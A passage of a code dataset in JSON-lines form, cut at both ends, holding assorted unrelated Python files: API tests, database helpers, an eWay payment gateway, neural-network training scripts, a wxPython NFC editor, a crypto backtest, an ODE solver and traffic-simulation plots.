\"456464565jjj45645646\"}\n endpoint = \"/boards/boardObject.id/labels\"\n expected = \"/boards/1231231312aa2212133/labels\"\n request_api = RequestApi()\n actual = request_api.replace_variables(endpoint, id_dictionary)\n assert expected == actual\n\n\ndef test_replace_variable_sendsIValidDictionaryAndInputEndpoint_returnUrlWithoutChanges():\n id_dictionary = {\"invalidBoardObject\": \"1231231312aa2212133\", \"listObject\": \"456464565jjj45645646\"}\n endpoint = \"/boards/boardObject.id/labels\"\n expected = \"/boards/boardObject.id/labels\"\n request_api = RequestApi()\n actual = request_api.replace_variables(endpoint, id_dictionary)\n assert expected == actual\n","sub_path":"test/test_RequestApi.py","file_name":"test_RequestApi.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"38700237","text":"from app import db, models\nfrom datetime import date, timedelta\n\n\ndef add_deposit(bank, account_no, account_type, rate_of_interest, date_of_investment, due_date, invested_value,\n investor):\n deposit = models.Deposit(bank=bank, account_no=account_no, account_type=account_type,\n rate_of_interest=rate_of_interest, date_of_investment=date_of_investment,\n due_date=due_date,\n invested_value=invested_value, investor=investor)\n db.session.add(deposit)\n db.session.commit()\n\n\ndef delete_deposit(account_no_to_delete):\n deposit = models.Deposit.query.filter_by(account_no=account_no_to_delete)\n db.session.delete(deposit)\n db.session.commit()\n\n\ndef get_deposits():\n deposit = models.Deposit.query.order_by(models.Deposit.due_date).all()\n return deposit\n\n\ndef get_due_deposits(next_x_days):\n today = date.today()\n next_x_days_diff = today + timedelta(days=next_x_days)\n deposits_due = models.Deposit.query.filter(models.Deposit.due_date < next_x_days_diff).order_by(models.Deposit.due_date).all()\n return deposits_due\n","sub_path":"app/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"616195895","text":"#!/usr/bin/python\nimport numpy\ndef create_database ():\n\n import sqlite3 as DBI\n import sys\n db = DBI.connect('table.db')\n with db:\n cursor = db.cursor()\n\n#parameter\n cursor.execute(\"DROP TABLE IF EXISTS parameter;\") \n cursor.execute(\"CREATE TABLE parameter(id INT NOT NULL PRIMARY KEY, statusid INT, last_assigned_time INT, p1 FLOAT, p2 FLOAT, p3 FLOAT, p4 FLOAT, p5 FLOAT);\")\n\n#problemstatus\n cursor.execute(\"DROP TABLE IF EXISTS problemstatus;\") \n cursor.execute(\"CREATE TABLE problemstatus(id INT NOT NULL PRIMARY KEY, status TINYTEXT);\")\n cursor.execute(\"INSERT INTO problemstatus VALUES(0,'unsolved');\")\n cursor.execute(\"INSERT INTO problemstatus VALUES(1,'solved');\")\n cursor.execute(\"INSERT INTO problemstatus VALUES(2,'unsolvable');\")\n\n#user\n cursor.execute(\"DROP TABLE IF EXISTS user;\")\n cursor.execute(\"CREATE TABLE user(id INT NOT NULL PRIMARY KEY, name TINYTEXT);\")\n\n#result\n cursor.execute(\"DROP TABLE IF EXISTS result;\") \n cursor.execute(\"CREATE TABLE result(id INT NOT NULL PRIMARY KEY, answer FLOAT);\")\n\n#contributor\n cursor.execute(\"DROP TABLE IF EXISTS contributor;\")\n cursor.execute(\"CREATE TABLE contributor(userid INT, resultid INT);\")\n \n#joblist\n cursor.execute(\"DROP TABLE IF EXISTS joblist;\") \n cursor.execute(\"CREATE TABLE joblist(id INT NOT NULL PRIMARY KEY, parameterid INT, userid INT);\") \n\n db.commit()\n db.close()\n \n#You should specify how many new groups of parameters you want to create\ndef update_paramters(number_of_groups):\n import sqlite3 as DBI2\n db = DBI2.connect('./table.db')\n cursor = db.cursor()\n cursor.execute('SELECT parameter.id FROM parameter')\n get=cursor.fetchall()\n db.commit()\n number_of_existed_groups = len(get)\n for i in range(int(number_of_groups)):\n mu, sigma = 5, 1\n p1 = float(numpy.random.normal(mu,sigma,1))\n mu, sigma = 2, 0.25\n p2 = float(numpy.random.normal(mu,sigma,1))\n mu, sigma = -2, 0.75\n p3 = float(numpy.random.normal(mu,sigma,1))\n mu, sigma = 0.5, 0.1\n p4 = float(numpy.random.normal(mu,sigma,1))\n mu, sigma = 1.234, 0.321\n p5 = float(numpy.random.normal(mu,sigma,1))\n cursor.execute(\"INSERT INTO parameter VALUES({},0,0,{},{},{},{},{});\".format(number_of_existed_groups+i,p1,p2,p3,p4,p5))\n db.commit()\n \n###############################################################################\ncreate_database()\nupdate_paramters(5)\n","sub_path":"src/setUpALocalServer/create_database.py","file_name":"create_database.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"150787944","text":"\nfrom django.conf import settings\nfrom eway_api.client import RebillEwayClient, HOSTED_TEST_URL, HOSTED_LIVE_URL\nfrom billing import Gateway\nfrom billing.signals import transaction_was_successful, transaction_was_unsuccessful\nfrom billing.utils.credit_card import Visa, MasterCard, DinersClub, JCB, AmericanExpress\n\nclass EwayGateway(Gateway):\n default_currency = \"AUD\"\n supported_countries = [\"AU\"]\n supported_cardtypes = [Visa, MasterCard, AmericanExpress, DinersClub, JCB]\n homepage_url = \"https://eway.com.au/\"\n display_name = \"eWay\"\n\n def __init__(self):\n self.test_mode = getattr(settings, 'MERCHANT_TEST_MODE', True)\n self.client = RebillEwayClient(test_mode=self.test_mode,\n customer_id=settings.EWAY_CUSTOMER_ID,\n username=settings.EWAY_USERNAME,\n password=settings.EWAY_PASSWORD,\n url=self.service_url,\n )\n self.hosted_customer = self.client.client.factory.create(\"CreditCard\")\n \n def add_creditcard(self, credit_card):\n \"\"\"add credit card details to the request parameters\"\"\"\n self.hosted_customer.CCNumber = credit_card.number\n self.hosted_customer.CCNameOnCard = credit_card.name\n self.hosted_customer.CCExpiryMonth = '%02d' % (credit_card.month)\n self.hosted_customer.CCExpiryYear = str(credit_card.year)[-2:]\n self.hosted_customer.FirstName = credit_card.first_name\n self.hosted_customer.LastName = credit_card.last_name\n \n def add_address(self, options=None):\n \"\"\"add address details to the request parameters\"\"\"\n if not options:\n options = {}\n address = options.get(\"billing_address\", {})\n self.hosted_customer.Title = address.get(\"salutation\", \"Mr./Ms.\")\n self.hosted_customer.Address = address.get(\"address1\", '') + address.get(\"address2\", \"\")\n self.hosted_customer.Suburb = address.get(\"city\")\n self.hosted_customer.State = address.get(\"state\")\n self.hosted_customer.Company = address.get(\"company\")\n self.hosted_customer.PostCode = address.get(\"zip\")\n self.hosted_customer.Country = address.get(\"country\")\n self.hosted_customer.Email = options.get(\"email\")\n self.hosted_customer.Fax = address.get(\"fax\")\n self.hosted_customer.Phone = address.get(\"phone\")\n self.hosted_customer.Mobile = address.get(\"mobile\")\n self.hosted_customer.CustomerRef = address.get(\"customer_ref\")\n self.hosted_customer.JobDesc = address.get(\"job_desc\")\n self.hosted_customer.Comments = address.get(\"comments\")\n self.hosted_customer.URL = address.get(\"url\")\n\n @property\n def service_url(self):\n if self.test_mode:\n return HOSTED_TEST_URL\n return HOSTED_LIVE_URL\n\n def purchase(self, money, credit_card, options=None):\n \"\"\"Using Eway payment gateway , charge the given\n credit card for specified money\"\"\"\n if not options:\n options = {}\n if not self.validate_card(credit_card):\n raise InvalidCard(\"Invalid Card\")\n self.add_creditcard(credit_card)\n self.add_address(options)\n \n customer_id = self.client.create_hosted_customer(self.hosted_customer)\n if self.test_mode:\n customer_id = getattr(settings, 'EWAY_TEST_CUSTOMER_ID')\n pymt_response = self.client.process_payment(customer_id, \n money, \n options.get(\"invoice\", 'test'),\n options.get(\"description\", 'test'))\n \n if not hasattr(pymt_response, \"ewayTrxnStatus\"):\n transaction_was_unsuccessful.send(sender=self,\n type=\"purchase\",\n response=pymt_response)\n return {\"status\": \"FAILURE\", \"response\": pymt_response}\n\n if pymt_response.ewayTrxnStatus == \"False\":\n transaction_was_unsuccessful.send(sender=self,\n type=\"purchase\",\n response=pymt_response)\n return {\"status\": \"FAILURE\", \"response\": pymt_response}\n\n transaction_was_successful.send(sender=self,\n type=\"purchase\",\n response=pymt_response)\n return {\"status\": \"SUCCESS\", \"response\": pymt_response}\n \n def authorize(self, money, credit_card, options = None):\n raise NotImplementedError\n\n def capture(self, money, authorization, options = None):\n raise NotImplementedError\n\n def void(self, identification, options = None):\n raise NotImplementedError\n\n def credit(self, money, identification, options = None):\n raise NotImplementedError\n\n def recurring(self, money, creditcard, options = None):\n raise NotImplementedError\n\n def store(self, creditcard, options = None):\n raise NotImplementedError\n\n def unstore(self, identification, options = None):\n raise NotImplementedError\n\n","sub_path":"billing/gateways/eway_gateway/eway_gateway.py","file_name":"eway_gateway.py","file_ext":"py","file_size_in_byte":5296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"490480910","text":"#!/usr/bin/env python\n# ----------------------------------------------------------------------------\n# Copyright 2015-2016 Nervana Systems Inc.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ----------------------------------------------------------------------------\nimport os\nfrom neon.util.argparser import NeonArgparser\nfrom neon.optimizers import GradientDescentMomentum, Schedule, MultiOptimizer\nfrom neon.transforms import TopKMisclassification\nfrom neon.callbacks.callbacks import Callbacks\n\nfrom data import make_alexnet_train_loader, make_validation_loader\nfrom network_alexnet import create_network_lrn\n\n\n# parse the command line arguments (generates the backend)\ntrain_config = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'train.cfg')\nconfig_files = [train_config] if os.path.exists(train_config) else []\n\nparser = NeonArgparser(__doc__, default_config_files=config_files)\nparser.add_argument('--subset_pct', type=float, default=100,\n help='subset of training dataset to use (percentage)')\nargs = parser.parse_args()\n\nmodel, cost = create_network_lrn()\nrseed = 0 if args.rng_seed is None else args.rng_seed\n\n# setup data provider\nassert 'train' in args.manifest, \"Missing train manifest\"\nassert 'val' in args.manifest, \"Missing validation manifest\"\ntrain = make_alexnet_train_loader(args.manifest['train'], args.manifest_root,\n model.be, args.subset_pct, rseed)\nvalid = make_validation_loader(args.manifest['val'], args.manifest_root,\n model.be, args.subset_pct)\n\nweight_sched = Schedule(20, 0.1)\nopt_gdm = GradientDescentMomentum(0.01, 0.9, wdecay=0.0005, schedule=weight_sched,\n stochastic_round=args.rounding)\nopt_biases = GradientDescentMomentum(0.02, 0.9, schedule=weight_sched,\n stochastic_round=args.rounding)\nopt = MultiOptimizer({'default': opt_gdm, 'Bias': opt_biases})\n\n# configure callbacks\nvalmetric = TopKMisclassification(k=5)\ncallbacks = Callbacks(model, eval_set=valid, metric=valmetric, **args.callback_args)\nmodel.fit(train, optimizer=opt, num_epochs=args.epochs, cost=cost, callbacks=callbacks)\n","sub_path":"examples/imagenet/alexnet_lrn.py","file_name":"alexnet_lrn.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"399776164","text":"import grovenfctag\nimport wx\nimport wx.grid\nimport wx.propgrid as wxpg\n\nclass HexValidator(wx.PyValidator): \n def __init__(self): \n wx.PyValidator.__init__(self) \n wx.EVT_CHAR(self, self.OnChar) \n\n def Clone(self): \n return HexValidator() \n\n def Validate(self, win): \n tc = wxPyTypeCast(win, \"wxTextCtrl\") \n val = tc.GetValue() \n for x in val: \n if x not in \"0123456789abcdefABCDEF\": \n return false \n return true \n\n def OnChar(self, event): \n key = event.KeyCode\n if key < wx.WXK_SPACE or key == wx.WXK_DELETE or key > 255: \n event.Skip() \n return \n if chr(key) in \"0123456789abcdefABCDEF\": \n event.Skip() \n return \n# if not wxValidator_IsSilent(): \n# wxBell() \n return \n\nclass HexTextCtrl(wx.TextCtrl): \n def __init__(self,parent,id,text): \n wx.TextCtrl.__init__(self,parent, id, text,validator = HexValidator(), \n style=wx.TE_PROCESS_ENTER) \n self.SetInsertionPoint(0) \n self.SetMaxLength(2) \n #self.Bind(wx.EVT_TEXT, self.OnText) \n #self.Bind(wx.EVT_KEY_DOWN, self.OnKeyDown) \n# self.parentgrid=parentgrid \n self.userpressed=False \n\n def OnKeyDown(self, evt): \n self.userpressed=True \n evt.Skip() \n\n def OnText(self, evt): \n if len(evt.GetString())>=2 and self.userpressed: \n self.userpressed=False \n# wx.CallAfter(self.parentgrid.advanceCursor) \n\nclass GroveNFCTagModule:\n\n\n \n def __init__(self,pin):\n self.pin=pin\n \n def title(self):\n return \"I2C-%d: Grove NFC Tag:\"%self.pin\n \n @classmethod\n def classDescription(cls):\n return \"Grove NFC Tag\"\n \n def initSmall(self,parent,sizer):\n self.titleLabel=wx.StaticText(parent,wx.ID_ANY,self.title(),style=wx.ALIGN_CENTRE|wx.ST_NO_AUTORESIZE)\n self.blockSizer=wx.BoxSizer(wx.HORIZONTAL)\n self.blockLabel=wx.StaticText(parent,wx.ID_ANY,\"Block address: 0x\")\n self.blockEdit=wx.TextCtrl(parent,wx.ID_ANY,\"0\",validator = HexValidator())\n self.blockSizer.Add(self.blockLabel)\n self.blockSizer.Add(self.blockEdit)\n self.dataGrid=wx.GridSizer(4,4)\n oldFont=self.blockEdit.GetFont()\n newFont=wx.Font(oldFont.PointSize,wx.FONTFAMILY_TELETYPE,wx.FONTSTYLE_NORMAL,wx.FONTWEIGHT_NORMAL)\n self.blockEdit.SetFont(newFont)\n self.dataPoints=[]\n for c in range(0,16):\n dataPointEdit=wx.TextCtrl(parent,wx.ID_ANY,\"00\",validator = HexValidator())\n dataPointEdit.Bind(wx.EVT_TEXT,lambda evt, temp=c: self.OnDataPointChanged(evt, temp) )\n dataPointEdit.SetFont(newFont)\n dataPointEdit.SetMaxLength(2)\n dataPointEdit.SetMinSize((dataPointEdit.GetTextExtent(\"0000\")[0],-1))\n self.dataGrid.Add(dataPointEdit)\n self.dataPoints.append(dataPointEdit)\n sizer.Add(self.titleLabel,flag=wx.EXPAND|wx.ALIGN_CENTER,proportion=1)\n sizer.Add(self.blockSizer,flag=wx.EXPAND|wx.ALIGN_CENTER,proportion=1)\n sizer.Add(self.dataGrid)\n \n \n def OnDataPointChanged(self,event,pos):\n try: \n blockAddress=int(self.blockEdit.GetValue(),16)\n except ValueError:\n blockAddress=0\n grovenfctag.NFCBuffer[blockAddress+pos]=int(event.GetString(),16)\n \n def update(self):\n try: \n blockAddress=int(self.blockEdit.GetValue(),16)\n except ValueError:\n blockAddress=0\n for c in self.dataPoints:\n if not c.HasFocus() and c.GetValue()!=\"%02X\"%grovenfctag.NFCBuffer[blockAddress]:\n c.SetValue(\"%02X\"%grovenfctag.NFCBuffer[blockAddress])\n blockAddress+=1\n # set text if it isn't active\n","sub_path":"components/grovenfctagmodule.py","file_name":"grovenfctagmodule.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"518952720","text":" \r\nimport pyupbit\r\nimport numpy as np\r\n\r\nnp.set_printoptions()\r\n#OHLCV (open, high, low, close, volume)로 당일 시가, 고가, 저가, 종가, 거래량에 대한 데이터\r\ndf = pyupbit.get_ohlcv(\"KRW-XRP\", interval = \"minutes30\")\r\n\r\n# 변동성 돌파 기준 범위 계산, (고가 - 저가) * k값\r\ndf['range'] = (df['high'] - df['low']) * 0.5\r\n\r\n# # range 컬럼을 한칸씩 밑으로 내림 (.shift(1))\r\ndf['target'] = df['open'] + df['range'].shift(1)\r\n\r\n# np.where (조건문, 참일때 값, 거짓일떄 값)\r\ndf['ror'] = np.where(df['high'] > df['target'],\r\n df['close'] / df['target'],\r\n 1)\r\n\r\n#누적 곡 계산()\r\ndf['hpr'] = df['ror'].cumprod()\r\ndf['MDD'] = (df['hpr'].cummax() - df['hpr']) / df['hpr'].cummax() * 100\r\nprint(\"MDD(%): \", df['MDD'].max())\r\n\r\n\r\n#추가 macd 지표\r\n\r\nmacd_short, macd_long, macd_signal = 12,26,9 #기본값 \r\ndf[\"MACD_short\"] = df[\"close\"].ewm(span=macd_short).mean() \r\n\r\ndf[\"MACD_long\"] = df[\"close\"].ewm(span=macd_long).mean() \r\n\r\ndf[\"MACD\"] = df.apply(lambda x: (x[\"MACD_short\"]-x[\"MACD_long\"]), axis=1) \r\n\r\ndf[\"MACD_signal\"] = df[\"MACD\"].ewm(span=macd_signal).mean() \r\n\r\ndf[\"MACD_oscillator\"] = df.apply(lambda x:(x[\"MACD\"]-x[\"MACD_signal\"]), axis=1) \r\n\r\ndf[\"MACD_sign\"] = df.apply(lambda x: (\"buy\" if x[\"MACD\"]>x[\"MACD_signal\"] else \"sell\"), axis=1)\r\n\r\ndf.to_excel(\"xrp.xlsx\")","sub_path":"backtest.py","file_name":"backtest.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"460256531","text":"\"\"\"\n本例子采用tensorflow实现rnn网络构建mnist分类器\n\"\"\"\n\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n# 获取数据\nmnist = input_data.read_data_sets('/Users/qisc/deeplearning/deepclass/data/mnist', one_hot=True)\n\n# 超参数\nlr = 0.001\ntraining_iters = 100000\nbatch_size = 128\n\nn_inputs = 28 # 输入数据的维度\nn_steps = 28 # 时间序列跨度\nn_hidden_units = 128 # 隐藏神经元个数\nn_classes = 10 # 分类的结果\n\n# 设置tf 图的输入\nx = tf.placeholder(tf.float32, [None, n_steps, n_inputs])\ny = tf.placeholder(tf.float32, [None, n_classes])\n\n# 设置权重\nweights = {\n # (28, 128)\n 'in': tf.Variable(tf.random_normal([n_inputs, n_hidden_units])),\n # (128, 10)\n 'out': tf.Variable(tf.random_normal([n_hidden_units, n_classes]))\n}\n\nbiases = {\n # (128,)\n 'in': tf.Variable(tf.constant(0.1, shape=[n_hidden_units, ])),\n 'out': tf.Variable(tf.constant(0.1, shape=[n_classes, ])),\n}\n\n\n# 定义RNN\ndef RNN(X, weights, biases):\n # 输入层 X(128, 28 setps, 28 inputs)\n # ===> X(128*28, 28inputs)\n X = tf.reshape(X, [-1, n_inputs])\n # 输入层 ===> (128batch*28setps, 128hidden)\n X_in = tf.add(tf.matmul(X, weights['in']), biases['in'])\n # 输入层 ===> (128batch, 28setps, 128hidden)\n X_in = tf.reshape(X_in, [-1, n_steps, n_hidden_units])\n # 隐藏层\n lstm_cell = tf.contrib.rnn.LSTMCell(n_hidden_units, forget_bias=1.0, state_is_tuple=True)\n # LSTM 被分成两部分(c_state, m_state)\n _init_state = lstm_cell.zero_state(batch_size, dtype=tf.float32)\n outputs, states = tf.nn.dynamic_rnn(lstm_cell, X_in, initial_state=_init_state, time_major=False)\n\n # 输出层\n results = tf.add(tf.matmul(states[1], weights['out']), biases['out'])\n\n return results\n\n\n# 定义优化\npred = RNN(x, weights, biases)\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))\ntrain_op = tf.train.AdamOptimizer(lr).minimize(cost)\n\n# 定义评估\ncorrect_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n# 开始训练\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n step = 0\n while step * batch_size < training_iters:\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\n batch_xs = batch_xs.reshape([batch_size, n_steps, n_inputs])\n sess.run([train_op], feed_dict={\n x: batch_xs,\n y: batch_ys\n })\n if step % 20 == 0:\n print(sess.run(accuracy, feed_dict={\n x: mnist.test.images[:128].reshape([-1, n_steps, n_inputs]),\n y: mnist.test.labels[:128]\n }))\n step += 1\n","sub_path":"tf_rnn.py","file_name":"tf_rnn.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"583550351","text":"#! /usr/bin/python3\n\n# Explizites Mehrschrittverfahren für DGL 2. Ordnung\n\nimport numpy as np\nimport matplotlib\nimport openpyxl.utils\n\nimport matplotlib.pyplot as plt\nfrom openpyxl import Workbook\nfrom openpyxl.styles import Font\nfrom openpyxl.chart import (ScatterChart, Reference, Series)\n\n# Double derivative of a simple damped oscillator\ndef qdd(q, v, t):\n return -d/m*v - c/m*q + F/m\n\t\ndef excel_header(data):\n\tcol_num = len(data)\n\tfor i in range(col_num):\n\t\tcurrent_cell = sheet.cell(row=1, column=(i+1))\n\t\tcurrent_cell.font = Font(bold=True)\n\t\tcurrent_cell.value = data[i]\n\t\t\ndef excel_data(name_array):\n\tt_values = Reference(sheet, min_col=2, min_row=2, max_row=sheet.max_row)\n\n\tfor i, name in enumerate(name_array):\n\t\tchart = ScatterChart()\t\n\t\tchart.title = name\n\t\tchart.x_axis.title = 't in s'\n\t\tchart.y_axis.title = var_symbols[i] + ' in ' + units[i]\n\t\tvalues = Reference(sheet, min_col=3+i, min_row=1, max_row=sheet.max_row)\n\t\tloc = 'F' + str(15*i + 1)\n\t\ttypeseries = Series(values, t_values, title_from_data=True)\n\t\tchart.series.append(typeseries)\n\t\tchart.legend = None\n\t\tsheet.add_chart(chart, loc)\n\n# Benennungen\nvar_names = ['Verschiebung', 'Geschwindigkeit']\nvar_symbols = ['q', 'v']\nunits = ['m', 'm/s']\n\t\t\n# Systemeigenschaften\nm = 0.2\nc = 5.0\nd = 0.0\nF = 2.0\n\n# Zeitschrittsteuerung\nh = 0.001\nt0 = 0.0\nt_end = 2.0\nn = (t_end - t0)/h\n\n# Anfangsbedingungen\nq0 = 0.0\nv0 = 0.0\nv_halb0 = v0 - h/2 * qdd(q0, v0, t0)\n\n# Initialisierungen\nwb = Workbook()\nsheet = wb.active\nexcel_header(['k', 't [s]', 'q [m]', 'v [m/s]'])\nsheet.append(['[AB]', t0, q0, v0])\n\nt = t0\nq = q0\nv = v0\nt_halb = t0\nv_halb = v_halb0\n\nt_array = [t0]\nq_array = [q0]\nv_array = [v0]\n\n## Loop from k = 0 to n-1\nfor k in range(int(n)): \n\n\tv_halb = v_halb + h * qdd(q, v, t)\n\n\tq_halb = (q + h / 2 * v_halb)\n\tq = q + h * v_halb \n\n\tv = v_halb + h / 2 * qdd(q_halb, v_halb, t_halb)\n\n\tt_halb = t + h/2\n\tt = t + h\n\n\t# Einzelne Daten prüfen\n\t# print(str.rjust(str(k), 3) + ' ' + str.rjust(str(round(v_halb,3)), 6))\n\tt_array.append(t)\n\tq_array.append(q)\n\tv_array.append(v)\n\t\n\tsheet.append([k, t, q, v])\n\n## Convert list to array for graph plotting\nt_array = np.array(t_array)\nq_array = np.array(q_array)\nv_array = np.array(v_array)\n\n## Auswertung\nvalues = [q_array, v_array]\n\n# Matplotlib Graph\nfig, ax = plt.subplots(nrows=2, ncols=1, figsize=(6,7))\nfor i, type in enumerate(var_symbols):\n\tax[i].plot(t_array, values[i])# marker='o', markersize=2)\t\n\tax[i].set_xlim(left=t0, right=t_end)\n\tax[i].set_xlabel('t in s')\n\tax[i].set_ylim(bottom=np.amin(values[i]), top=np.amax(values[i]) + h/2)\n\tax[i].set_ylabel(type + ' in ' + units[i])\n\tax[i].set_title(var_names[i])\nfig.tight_layout()\nplt.show()\n\n# Chart\nexcel_data(var_names)\nwb.save('euler-msv-data.xlsx')","sub_path":"euler-msv.py","file_name":"euler-msv.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"81293801","text":"import math\nimport matplotlib.pyplot as plt\nimport BezirkeUndKreuzungen_100_V1 as v100_v1\nimport BezirkeUndKreuzungen_300_V1 as v300_v1\nimport BezirkeUndKreuzungen_100_V2 as v100_v2\nimport BezirkeUndKreuzungen_300_V2 as v300_v2\nimport Streckensperrung_100_mitAlternative as s100mit\nimport Streckensperrung_100_ohneAlternative as s100ohne\nimport Threshhold_Ints as t\n\n\ndef changeFormat(l):\n res = []\n for i in range(len(l[0])):\n temp = []\n for j in range(len(l)):\n temp.append(l[j][i])\n res.append(temp)\n return res\n\n\ndef convertTime(l):\n res = []\n for t in l:\n temp = str(t[0]).zfill(6)\n tempTime = sum([int(temp[0:2]) * 3600, int(temp[2:4]) * 60, int(temp[4:6]) * 1])\n res.append((tempTime, t[1]))\n return res\n\n\ndef countForEachTimeStep(l, timeintervall):\n res = []\n for i in range(timeintervall):\n curTimeStep = [x[1] for x in l if 3600 * i <= x[0] < 3600 * (i + 1)]\n flattened = [x for y in curTimeStep for x in y]\n counted = counts(flattened)\n res.append(counted)\n return res\n\n\ndef counts(a):\n b = list(set(a))\n b.sort()\n res = []\n for i in range(len(b)):\n res.append((b[i], a.count(b[i])))\n return res\n\n\ndef removeIrrelevantLinks(a, b):\n res = []\n for i in range(len(a)):\n temp = []\n for t in a[i]:\n if t[0] in b:\n temp.append(t)\n res.append(temp)\n return res\n\n\ndef take(l, n):\n return [a[n] for a in l]\n\n\n# relevant = [12, 14, 16, 32, 34, 36, 64, 66] # Links zu Sumo\ndef plotFahrzeugerzeugung(VOLUMEN, relevant, startDurchgang, endDurchgang):\n volumen_visum = [] # für jeden Link eine Liste aller Zeitschritte\n for LINK in relevant:\n volumen_visum.append(take(eval(\"v\" + VOLUMEN + \"_v1.d0_erzeugung_\" + str(LINK)), 0))\n volumen_sumo = []\n for i in range(startDurchgang, endDurchgang):\n volumen_sumo.append(eval(\"v\" + VOLUMEN + \"_v1.d\" + str(i) + \"_erzeugung_\" + str(LINK)))\n volumen_sumo.append(eval(\"v\" + VOLUMEN + \"_v2.d\" + str(i) + \"_erzeugung_\" + str(LINK)))\n volumen_sumo = [take(x, 1) for x in volumen_sumo]\n # print(str(LINK), \"(visum)\", volumen_visum[-1])\n # print(str(LINK), \"(sumo)\", volumen_sumo)\n plt.figure()\n plt.plot(range(1, len(volumen_visum[-1]) + 1), volumen_visum[-1], label=\"Berechnete Auslastung Visum\")\n plt.plot([], label=\"Geplante Fahrzeuge\")\n plt.boxplot(changeFormat(volumen_sumo))\n plt.title(\"Link \" + str(LINK) + \" und Volumen \" + VOLUMEN)\n plt.xlabel(\"Zeit [h]\")\n plt.ylabel(\"# Fahrzeuge\")\n plt.legend(loc=\"upper left\")\n\n\n# relevant = [-68, -67, -35, -15, 15, 35, 67, 68] # Links in Sumo\ndef plotRoutenplanung(VOLUMEN, VERSION, relevant, startDurchgang, endDurchgang, timeintervall):\n volumen_visum = []\n for LINK in relevant:\n link = \"m\" + str(LINK)[1:] if LINK < 0 else LINK\n volumen_visum.append(take(eval(\"v\" + VOLUMEN + \"_v\" + VERSION + \".visum_\" + str(link)), 1))\n # print(str(LINK), \"(visum)\", volumen_visum[-1])\n\n durchgaenge = []\n for i in range(startDurchgang, endDurchgang):\n converted = convertTime(eval(\"v\" + VOLUMEN + \"_v\" + VERSION + \".sumo_d\" + str(i) + \"_routing\"))\n counted = countForEachTimeStep(converted, timeintervall)\n onlyRelevant = removeIrrelevantLinks(counted, relevant)\n links = []\n for j in range(len(relevant)):\n zeitschritte = []\n for k in range(len(onlyRelevant)):\n for e in onlyRelevant[k]:\n if e[0] == relevant[j]:\n zeitschritte.append(e[1])\n break\n if len(zeitschritte) - 1 < k:\n zeitschritte.append(0)\n links.append(zeitschritte)\n durchgaenge.append(links)\n for i in range(len(relevant)):\n oneLink = take(durchgaenge, i)\n # print(str(relevant[i]), \"(sumo)\", oneLink)\n plt.figure()\n plt.plot(range(1, len(volumen_visum[i]) + 1), volumen_visum[i], label=\"Berechnete Auslastung Visum\")\n plt.plot([], label=\"Geplante Fahrzeuge\")\n plt.boxplot(changeFormat(oneLink))\n plt.title(\"Link \" + str(relevant[i]) + \" und Volumen \" + VOLUMEN)\n plt.xlabel(\"Zeit [h]\")\n plt.ylabel(\"# Fahrzeuge\")\n plt.legend(loc=\"upper left\")\n\n\n# relevant = [2,3,-5,(6,7,-8),9] # Links in Sumo\ndef plotRoutenplanung2(alt, relevant, startDurchgang, endDurchgang, timeintervall):\n volumen_visum = []\n for LINK in relevant:\n link = \"m\" + str(LINK)[1:] if LINK < 0 else LINK\n volumen_visum.append(take(eval(\"s100\" + alt + \".visum_\" + str(link)), 1))\n # print(str(LINK), \"(visum)\", volumen_visum[-1])\n\n durchgaenge = []\n for i in range(startDurchgang, endDurchgang):\n converted = convertTime(eval(\"s100\" + alt + \".sumo_d\" + str(i) + \"_routing\"))\n counted = countForEachTimeStep(converted, timeintervall)\n onlyRelevant = removeIrrelevantLinks(counted, relevant)\n links = []\n for j in range(len(relevant)):\n zeitschritte = []\n for k in range(len(onlyRelevant)):\n for e in onlyRelevant[k]:\n if e[0] == relevant[j]:\n zeitschritte.append(e[1])\n break\n if len(zeitschritte) - 1 < k:\n zeitschritte.append(0)\n links.append(zeitschritte)\n durchgaenge.append(links)\n for i in range(len(relevant)):\n oneLink = take(durchgaenge, i)\n # print(str(relevant[i]), \"(sumo)\", oneLink)\n plt.figure()\n # plt.plot(range(1, len(volumen_visum[i]) + 1), volumen_visum[i], label=\"Berechnete Auslastung Visum\")\n # plt.plot([], label=\"Geplante Fahrzeuge\")\n plt.boxplot(changeFormat(oneLink))\n plt.title(\"Link \" + str(relevant[i]) + \" und Volumen 100\")\n plt.xlabel(\"Zeit [h]\")\n plt.ylabel(\"# Fahrzeuge\")\n # plt.legend(loc=\"upper left\")\n\n\ndef plotThreshhold(threshhold, startDurchgang, endDurchgang):\n newCalc = []\n for i in range(startDurchgang, endDurchgang):\n 